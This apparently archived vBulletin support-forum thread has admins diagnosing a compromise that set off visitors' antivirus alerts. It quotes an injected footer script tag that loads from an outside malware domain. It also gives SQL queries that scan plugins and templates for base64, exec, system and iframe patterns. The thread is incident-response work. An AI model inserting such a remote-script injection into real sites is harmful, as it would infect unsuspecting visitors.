Announcement

Collapse
No announcement yet.

Forums triggering virus alerts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts
    eJM
    Senior Member

  • eJM
    replied
    Originally posted by Wayne Luke View Post
    Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.
    Thanks for the help, Wayne. But please remember this forum is the vBulletin 3.8 Questions, Problems and Troubleshooting forum. None of us seeking support here are using anything greater than that version.

    Jim

    Leave a comment:

  • Wayne Luke
    vBulletin Technical Support Lead

  • Wayne Luke
    replied
    Common insertion of virus warnings is they alter the footer template and replace the connection-min.js file in clientscript/yui/connection folder.

    To find exploits embedded in your system you can follow these steps:

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for step 4 and 5 -
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

    7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there.

    Finally, make sure your vBulletin is up to date. Currently this is version 4.1.9.

    Leave a comment:

  • eJM
    Senior Member

  • eJM
    replied
    I have gotten several malware warnings over the last few weeks. I can't find a problem anywhere, but have read a number of complaints blaming Google Adsense ads. Most of those complaints have been going on in the Google help forums. This is not the only time it has happened. https://www.google.com/search?q=adse...ient=firefox-a

    Leave a comment:

  • MarkTTU
    New Member

  • MarkTTU
    replied
    I would love to figure it out as well. I'm going to try disabling all adversing today and see what happens. I really don't suspect Google, but I'm running out of things to try.

    We have about 5k uniquies a day and maybe 2-3 reporting issues. Thing is they're running IE7, IE8, IE9, and FF so its not as isolated as I'd originally thought...

    Leave a comment:

  • 45Wheelgun
    Member

  • 45Wheelgun
    replied
    Our forum has been dealing with this since December 11. We have had 25-30 people over 16 days report issues. We are a mid-sized board with 20,000+ uniques per day. Out of 20k uniques per day, 1 or 2 of them report either getting a virus, or having their virus software notify them that a virus was blocked. That is .005% of our unique visitors reporting issues. Of course all of them claim it only happens when they visit our website.

    We run on dedicated servers which have been check, rechecked and then checked again. We have compared our files with the maintenance tools as well as our templates. I have had a group of people running fiddler2 for days and none of us has seen anything.

    I would love to figure this one out. I would like to know why it only bothers a small fraction of my users.

    Leave a comment:

  • MarkTTU
    New Member

  • MarkTTU
    replied
    Originally posted by creativepart View Post
    You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.
    Been playing around with the forum with Fiddler2 and have yet to find anything. Could it be that these guys got infected somewhere else and it gets triggered when they visit a VB site?

    Leave a comment:

  • Wardsweb
    Member

  • Wardsweb
    replied
    Originally posted by Simon Lloyd View Post
    You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

    I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!
    We are on a dedicated server, so I had the server company replace all the templates from a backup. We backup the site daily and used one from 30 days ago to retreive the files. Still there are a couple posts after the reinstall of people being hit. Whatever it is, it is very nasty taking over their computers to the point of having to reformat or reinstall from a cloned drive or backup.

    Leave a comment:

  • creativepart
    Senior Member

  • creativepart
    replied
    When we had this issue I downloaded and installed Fiddler2 on my desktop computer. This little free program runs in a separate window and lists every file, function and script called while your page loads. I couldn't "see" any problems on my site until I loaded this and watched a page load. That's when I started seeing some script at alltagcloud.info loading with each page load. And, since Fiddler2 shows everything loading in order I could see that the script was being called near or in the footer which narrowed down the search. We were surprised to find the script was actually named something different than alltagcloud.info and I'd guess they have multiple versions of this with different names. Initially something named "pageviewapi.com" sounding fairly normal for the standard VB footer code.

    You might want to check out http://www.fiddler2.com/fiddler2/ and see if that helps.

    Leave a comment:

  • MarkTTU
    New Member

  • MarkTTU
    replied
    We have a few members grumbling about this as well, but thus far I haven't been able to find a thing. I've even tried accessing the site from inside a VM with virgin XP and 7 installs and no protection of any kind hoping to get some kind of infection, but haven't managed to infect myself.

    I did look and couldn't find any reference to www.pageviewapi.com anywhere.

    Leave a comment:

  • Wardsweb
    Member

  • Wardsweb
    replied
    Many members have referenced the Toolkit and this IP address 178.17.163.189. The domain name may change but the IP is the same. Even with this IP set 178.17.163. in the .htaccess, some are still getting hit.

    Even the hosting company is trying to find where this is being launched to no avail.
    Attached Files

    Leave a comment:

  • Wardsweb
    Member

  • Wardsweb
    replied
    Originally posted by creativepart View Post
    We found it on our system. Look for this code:
    Code:
    <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
    We found it in the Footer -- right after the
    Code:
    <form action="$vboptions[forumhome].php" method="get">
    Thanks - I looked but not found.

    Leave a comment:

  • creativepart
    Senior Member

  • creativepart
    replied
    We found it on our system. Look for this code:
    Code:
    <script type="text/javascript" src="http://www.pageviewapi.com/icons/icons.php"></script>
    We found it in the Footer -- right after the
    Code:
    <form action="$vboptions[forumhome].php" method="get">

    Leave a comment:

  • creativepart
    Senior Member

  • creativepart
    replied
    A lot of forums suddenly started having issues yesterday. Our users suddenly have to hit their "back" button multiple times to move back one page. Seems that MS IE users are complaining exclusively. But I'm not positive. My users have pointed out issues with some file called www.alltagcloud.info/icons/index.html I network with a couple of dozen other VB forum admins, they started seeing this yesterday as well. They are thinking it's some Adsense ad possibly.
    creativepart
    Senior Member
    Last edited by creativepart; Sun 18 Dec '11, 4:10pm.

    Leave a comment:

  • syrus.xl
    Senior Member

  • syrus.xl
    replied
    Hi,

    Sounds like you have an iframe sql injection. It can be in your templates, but not always - it varies.

    Checking your source code may or may not find it either. Download Developer Tools for Firefox - then check Generated Source Code, this will show up any hidden source code that you normally will not see. Once you find which template it is, just hit Save on that template and it will remove and injected code.

    Re-uploading all vBulletin core files will not always correct this problem if you the person has hidden 'backdoor' files in your vBulletin, in which case check your Suspect Files for Base64 coding, or additional encoded javascript files, all of which will 'kill' your forum eventually.

    Leaving 'backdoor' files in vBulletin or any script, will not stop a malicious attack even if you are running the latest vBulletin with all patches. Blocking IP's in your .htaccess file will just cause your forum to respond slower after awhile, since each I.P will be checked before allowing access.

    Regards,

    Leave a comment:

  • Simon Lloyd
    Senior Member

  • Simon Lloyd
    replied
    Originally posted by Wardsweb View Post
    While only about 10 of the 116,000 members have problems, I'm not going to be too worried about it. Reloading the site would be the last option. There are a lot of modules, graphic and monetary changes to the site making a reload a not so simple task.
    You shouldn't have a problem with following Trevors suggestion unless you have modified vbulletin core files, if you haven't then nothing that you have done to your forum mods, templates, css or database will change - if you do have an issue it could potentially be scraping data from your database including emails, passwords and anything else thats stored.

    I know because i have just helped another forum owner out that had been infected through a poorly secured modification (it's been fixed now at vb.org) which allowed the attacker to upload an extra file to the includes folder which in turn gets ALL the information of that server and i mean evereything!

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X